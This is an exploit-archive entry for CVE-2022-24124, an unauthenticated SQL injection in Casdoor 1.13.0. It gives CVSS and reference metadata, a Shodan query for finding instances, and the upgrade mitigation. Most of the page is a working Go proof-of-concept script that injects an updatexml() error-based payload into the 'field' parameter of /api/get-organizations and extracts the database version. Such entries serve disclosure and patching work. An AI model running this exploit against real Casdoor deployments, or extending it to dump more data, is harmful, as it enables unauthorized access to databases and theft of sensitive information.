Casdoor 1.13.0 - SQL Injection (Unauthenticated)

vendor:

Casdoor

by:

Mayank Deshmukh

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Casdoor

Affected Version From: < 1.13.1

Affected Version To: 1.13.0

Patch Exists: YES

Related CWE: CVE-2022-24124

CPE: a:casdoor:casdoor:1.13.0

Metasploit:

Other Scripts:

Tags: sqli,unauth,packetstorm,edb,cve,cve2022,casdoor

CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Nuclei References: https://packetstormsecurity.com/files/166163/Casdoor-1.13.0-SQL-Injection.html, https://www.exploit-db.com/exploits/50792, https://github.com/cckuailong/reapoc/tree/main/2022/CVE-2022-24124/vultarget, https://nvd.nist.gov/vuln/detail/CVE-2022-24124, https://github.com/casdoor/casdoor/compare/v1.13.0...v1.13.1

Nuclei Metadata: {'max-request': 1, 'product': 'casdoor', 'shodan-query': 'http.title:"Casdoor"', 'vendor': 'casbin'}

Platforms Tested: Kali Linux

2022

Casdoor 1.13.0 – SQL Injection (Unauthenticated)

Casdoor is vulnerable to an unauthenticated SQL injection vulnerability due to improper input validation. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This can allow the attacker to execute arbitrary SQL commands on the underlying database, potentially leading to the disclosure of sensitive information.

Mitigation:

Upgrade to version 1.13.1 or later.

Source

Exploit-DB raw data:

// Exploit Title: Casdoor 1.13.0 - SQL Injection (Unauthenticated) 
// Date: 2022-02-25
// Exploit Author: Mayank Deshmukh
// Vendor Homepage: https://casdoor.org/
// Software Link: https://github.com/casdoor/casdoor/releases/tag/v1.13.0
// Version: version < 1.13.1
// Security Advisory: https://github.com/advisories/GHSA-m358-g4rp-533r
// Tested on: Kali Linux
// CVE : CVE-2022-24124
// Github POC: https://github.com/ColdFusionX/CVE-2022-24124

// Exploit Usage : go run exploit.go -u http://127.0.0.1:8080

package main

import (
	"flag"
	"fmt"
	"html"
	"io/ioutil"
	"net/http"
	"os"
	"regexp"
	"strings"
)

func main() {
	var url string
	flag.StringVar(&url, "u", "", "Casdoor URL (ex. http://127.0.0.1:8080)")
	flag.Parse()

	banner := `
-=Casdoor SQL Injection (CVE-2022-24124)=- 
- by Mayank Deshmukh (ColdFusionX)

`
	fmt.Printf(banner)
	fmt.Println("[*] Dumping Database Version")
	response, err := http.Get(url + "/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(null,version(),null)")

	if err != nil {
		panic(err)
	}

	defer response.Body.Close()

	databytes, err := ioutil.ReadAll(response.Body)

	if err != nil {
		panic(err)
	}

	content := string(databytes)

	re := regexp.MustCompile("(?i)(XPATH syntax error.*&#39)")

	result := re.FindAllString(content, -1)
	
	sqliop := fmt.Sprint(result)
	replacer := strings.NewReplacer("[", "", "]", "", "&#39", "", ";", "")
	
	finalop := replacer.Replace(sqliop)
	fmt.Println(html.UnescapeString(finalop))


	if result == nil {
		fmt.Printf("Application not vulnerable\n")
		os.Exit(1)
	}

}